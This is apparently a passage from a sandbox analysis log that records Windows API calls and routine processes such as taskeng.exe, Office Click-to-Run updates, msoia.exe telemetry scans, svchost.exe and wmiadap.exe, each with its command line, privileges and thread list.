[0096.859] SetEvent (hEvent=0x308) returned 1 [0096.859] SetEvent (hEvent=0x30c) returned 1 [0096.859] SetEvent (hEvent=0x324) returned 1 [0096.859] SetEvent (hEvent=0x344) returned 1 [0096.859] SetEvent (hEvent=0x338) returned 1 [0096.859] SetEvent (hEvent=0x33c) returned 1 [0096.859] SetEvent (hEvent=0x340) returned 1 [0096.859] SetEvent (hEvent=0x348) returned 1 [0096.859] CoUninitialize () Thread: id = 101 os_tid = 0xb94 Thread: id = 102 os_tid = 0xb98 Thread: id = 103 os_tid = 0xb9c [0088.975] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0088.979] ResetEvent (hEvent=0x388) returned 1 Thread: id = 114 os_tid = 0x114 Thread: id = 115 os_tid = 0x880 [0096.973] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0096.974] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0096.975] VirtualQuery (in: lpAddress=0x1d8bd980, lpBuffer=0x1d8be840, dwLength=0x30 | out: lpBuffer=0x1d8be840*(BaseAddress=0x1d8bd000, AllocationBase=0x1cf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0096.975] VirtualQuery (in: lpAddress=0x1d8bdc30, lpBuffer=0x1d8beaf0, dwLength=0x30 | out: lpBuffer=0x1d8beaf0*(BaseAddress=0x1d8bd000, AllocationBase=0x1cf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0096.982] SetEvent (hEvent=0x36c) returned 1 [0096.982] SetEvent (hEvent=0x464) returned 1 [0096.982] SetEvent (hEvent=0x6ac) returned 1 [0096.982] SetEvent (hEvent=0x36c) returned 1 [0096.982] SetEvent (hEvent=0x464) returned 1 [0096.982] SetEvent (hEvent=0x6bc) returned 1 [0096.982] SetEvent (hEvent=0x6b0) returned 1 [0096.982] SetEvent (hEvent=0x6b4) returned 1 [0096.982] SetEvent (hEvent=0x6b8) returned 1 [0096.982] SetEvent (hEvent=0x6c0) returned 1 [0096.983] CoUninitialize () Process: id = "6" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x3333c000" os_pid = "0x890" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x370" cmd_line = "taskeng.exe {7E4C57B0-8162-4963-A1FA-4E3807D99D57} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2ee" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 119 os_tid = 0x888 Thread: id = 120 os_tid = 0x884 Thread: id = 121 os_tid = 0x8b4 Thread: id = 122 os_tid = 0x8bc Thread: id = 123 os_tid = 0x8c8 Thread: id = 127 os_tid = 0x8c4 Thread: id = 128 os_tid = 0x8c0 Thread: id = 129 os_tid = 0x8b8 Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x6909b000" os_pid = "0x8a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x370" cmd_line = "taskeng.exe {E85CCDCA-3DC7-411E-A71C-BC56B77173AA} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\\aETAdzjz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 124 os_tid = 0x8a4 Thread: id = 125 os_tid = 0x8a0 Thread: id = 126 os_tid = 0x89c Thread: id = 132 os_tid = 0x8dc Thread: id = 133 os_tid = 0x610 Thread: id = 134 os_tid = 0x360 Thread: id = 135 os_tid = 0x5e4 Thread: id = 136 os_tid = 0x57c Process: id = "8" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x688fa000" os_pid = "0x898" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x890" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /update SCHEDULEDTASK displaylevel=False" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2ee" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 130 os_tid = 0x554 Thread: id = 140 os_tid = 0x118 Thread: id = 142 os_tid = 0x574 Thread: id = 193 os_tid = 0x5a0 Thread: id = 194 os_tid = 0x95c Thread: id = 197 os_tid = 0xa54 Thread: id = 199 os_tid = 0xa68 Thread: id = 203 os_tid = 0xa28 Thread: id = 204 os_tid = 0xa84 Thread: id = 205 os_tid = 0xa2c Thread: id = 210 os_tid = 0xabc Thread: id = 221 os_tid = 0xac8 Thread: id = 228 os_tid = 0x228 Thread: id = 230 os_tid = 0x38c Process: id = "9" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x65aef000" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x890" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /WatchService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2ee" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 131 os_tid = 0x8cc Thread: id = 139 os_tid = 0x8e0 Thread: id = 141 os_tid = 0x578 Thread: id = 192 os_tid = 0x8e4 Thread: id = 195 os_tid = 0x5f0 Thread: id = 196 os_tid = 0x76c Thread: id = 198 os_tid = 0xa6c Thread: id = 200 os_tid = 0xa64 Thread: id = 201 os_tid = 0xa38 Thread: id = 202 os_tid = 0xa3c Thread: id = 206 os_tid = 0xa30 Thread: id = 220 os_tid = 0x7a4 Thread: id = 223 os_tid = 0xb1c Thread: id = 226 os_tid = 0x2c8 Thread: id = 229 os_tid = 0x8d8 Process: id = "10" image_name = "msoia.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\msoia.exe" page_root = "0x692aa000" os_pid = "0x5c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x8a8" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\" scan upload" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 137 os_tid = 0x790 Thread: id = 143 os_tid = 0x364 Thread: id = 144 os_tid = 0x110 Thread: id = 147 os_tid = 0x140 Thread: id = 149 os_tid = 0x558 Thread: id = 151 os_tid = 0xb0 Thread: id = 152 os_tid = 0x9a4 Thread: id = 155 os_tid = 0xa00 Thread: id = 156 os_tid = 0xa08 Thread: id = 174 os_tid = 0x844 Thread: id = 175 os_tid = 0x904 Thread: id = 176 os_tid = 0x520 Thread: id = 177 os_tid = 0x6ec Thread: id = 178 os_tid = 0xc4 Thread: id = 232 os_tid = 0x114 Process: id = "11" image_name = "msoia.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\msoia.exe" page_root = "0x672af000" os_pid = "0x618" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x8a8" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\" scan upload mininterval:2880" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 138 os_tid = 0x30c Thread: id = 145 os_tid = 0x7e8 Thread: id = 146 os_tid = 0x178 Thread: id = 148 os_tid = 0x5e0 Thread: id = 150 os_tid = 0x570 Thread: id = 153 os_tid = 0x1ec Thread: id = 154 os_tid = 0x478 Thread: id = 172 os_tid = 0xa0c Thread: id = 173 os_tid = 0xa58 Thread: id = 179 os_tid = 0x35c Thread: id = 180 os_tid = 0x484 Thread: id = 181 os_tid = 0x238 Thread: id = 182 os_tid = 0x2b4 Thread: id = 183 os_tid = 0x600 Thread: id = 231 os_tid = 0x240 Thread: id = 233 os_tid = 0xb28 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x11857000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x5c4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e25b" [0xc000000f], "LOCAL" [0x7] Thread: id = 157 os_tid = 0xb60 Thread: id = 158 os_tid = 0x9e0 Thread: id = 159 os_tid = 0x964 Thread: id = 160 os_tid = 0x7e0 Thread: id = 161 os_tid = 0x7d4 Thread: id = 162 os_tid = 0x7c4 Thread: id = 163 os_tid = 0x7ac Thread: id = 164 os_tid = 0x788 Thread: id = 165 os_tid = 0x778 Thread: id = 166 os_tid = 0x770 Thread: id = 167 os_tid = 0x144 Thread: id = 168 os_tid = 0x15c Thread: id = 169 os_tid = 0x128 Thread: id = 170 os_tid = 0x12c Thread: id = 171 os_tid = 0x11c Thread: id = 184 os_tid = 0x744 Thread: id = 185 os_tid = 0x4fc Thread: id = 186 os_tid = 0x5c0 Thread: id = 187 os_tid = 0x358 Thread: id = 188 os_tid = 0x784 Thread: id = 189 os_tid = 0x808 Thread: id = 190 os_tid = 0x828 Thread: id = 191 os_tid = 0x83c Thread: id = 207 os_tid = 0xa9c Thread: id = 208 os_tid = 0xab0 Thread: id = 209 os_tid = 0xaa8 Thread: id = 222 os_tid = 0x5cc Thread: id = 224 os_tid = 0x248 Thread: id = 227 os_tid = 0x2ac Thread: id = 285 os_tid = 0xb8c Thread: id = 286 os_tid = 0x9d8 Process: id = "13" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x76b7a000" os_pid = "0x6c8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2ee" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 236 os_tid = 0x710 Thread: id = 237 os_tid = 0x7b8 Thread: id = 238 os_tid = 0xbc0 Thread: id = 239 os_tid = 0xbd4 Thread: id = 240 os_tid = 0xbd0 Thread: id = 241 os_tid = 0xbcc Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a434000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x370" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bbbd" [0xc000000f], "LOCAL" [0x7] Thread: id = 242 os_tid = 0xad8 Thread: id = 243 os_tid = 0x4d8 Thread: id = 244 os_tid = 0x204 Thread: id = 245 os_tid = 0x6bc Thread: id = 246 os_tid = 0x420 Thread: id = 247 os_tid = 0xab8 Thread: id = 248 os_tid = 0xaac Thread: id = 249 os_tid = 0xa10 Thread: id = 250 os_tid = 0x87c Thread: id = 251 os_tid = 0x838 Thread: id = 252 os_tid = 0x818 Thread: id = 253 os_tid = 0x40c Thread: id = 254 os_tid = 0x6ac Thread: id = 255 os_tid = 0x7f4 Thread: id = 256 os_tid = 0x6a4 Thread: id = 257 os_tid = 0xc0 Thread: id = 258 os_tid = 0x714 Thread: id = 259 os_tid = 0x8f8 Thread: id = 260 os_tid = 0xbe0 Thread: id = 261 os_tid = 0xbdc Thread: id = 262 os_tid = 0xa20 Thread: id = 263 os_tid = 0x980 Thread: id = 264 os_tid = 0x718 Thread: id = 265 os_tid = 0x274 Thread: id = 266 os_tid = 0x628 Thread: id = 267 os_tid = 0x620 Thread: id = 268 os_tid = 0x608 Thread: id = 269 os_tid = 0x5b0 Thread: id = 270 os_tid = 0x150 Thread: id = 271 os_tid = 0x36c Thread: id = 272 os_tid = 0x3c0 Thread: id = 273 os_tid = 0x3b8 Thread: id = 274 os_tid = 0x3a8 Thread: id = 275 os_tid = 0x300 Thread: id = 276 os_tid = 0x2fc Thread: id = 277 os_tid = 0x2d8 Thread: id = 278 os_tid = 0x2d0 Thread: id = 284 os_tid = 0x9f8 Thread: id = 287 os_tid = 0x5ac Thread: id = 288 os_tid = 0x7cc